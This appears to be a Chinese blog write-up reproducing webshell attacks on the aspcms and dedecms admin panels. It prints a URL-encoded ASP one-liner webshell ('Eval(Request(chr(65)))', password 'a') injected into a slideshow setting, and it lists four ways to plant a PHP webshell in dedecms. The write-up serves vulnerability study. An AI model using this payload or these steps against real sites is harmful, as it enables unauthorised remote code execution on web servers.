当前位置: 首页 > article >正文

dedecms(四种webshell姿势)、aspcms webshell漏洞复现

article 2024/9/25 6:15:17

一、aspcms webshell

1、登陆后台,在扩展功能的幻灯片设置模块,点击保存进行抓包查看

 2、在slideTextStatus写入asp一句话木马 

1%25><%25Eval(Request(chr(65)))%25><%25 密码是a,放行,修改成功

 

3、使用菜刀工具连接查看

 

二、dedecms  webshell

1、在附件管理上传文件可以上传一句话木马php文件

2、在模板管理的index.php文件中写入phpinfo()查看

 

3、在广告管理,添加广告内容出添加一句话木马,使用蚁剑连接查看

 

4、系统中SQL命令执行工具中可以执行写入一句话木马文件


http://www.kler.cn/news/307758.html

相关文章:

  • VMWare中的Centos8:Errors during downloading metadata for repository ‘appstream‘
  • 0基础跟德姆(dom)一起学AI 数据处理和统计分析02-Linux进阶
  • S3C2440开发板点亮LED灯+PWM定时器
  • 深入理解图卷积网络(4)
  • 极狐GitLab DevSecOps 功能合集(七大安全功能)
  • Untiy中给资源名改大小写
  • 程易科技AI OS:赋能开发者,构建智慧未来
  • golang学习笔记21——golang协程管理及sync.WaitGroup的使用
  • Linux云计算 |【第三阶段】PROJECT1-DAY1
  • Spring Boot-自动配置问题
  • SQL题目分析:打折日期交叉问题--计算品牌总优惠天数
  • DDD的主要流程
  • Gson转换
  • Matlab simulink建模与仿真 第十六章(用户定义函数库)
  • matlab边缘点提取函数
  • debian服务器上搭建git服务及添加文件提交拉取的操作记录、在Ubuntu上搭建Jenkins服务以及Ubuntu中的PPA源及PPA的安装使用
  • 【C++学习】 IO 流揭秘:高效数据读写的最佳实践
  • 1×4矩阵键盘详解(STM32)
  • 基于小程序的教学辅助微信小程序设计+ssm(lw+演示+源码+运行)
  • 在Flask中实现跨域请求(CORS)
  • 建模杂谈系列256 规则函数化改造
  • Kotlin:1.9.0 的新特性
  • 鸿萌数据恢复服务:如何恢复 Mac 系统中被擦除的文件?
  • 网络高级项目( 基于webserver的工业数据采集和控制项目)
  • Https AK--(ssl 安全感满满)
  • 【LIO】FAST-LIO论文详解
  • 如何在C++中使用mupdf操作pdf文件(一)
  • 微信小程序页面制作——婚礼邀请函(含代码)
  • 深入探讨ES6高级特性与实际应用
  • 注册登录案列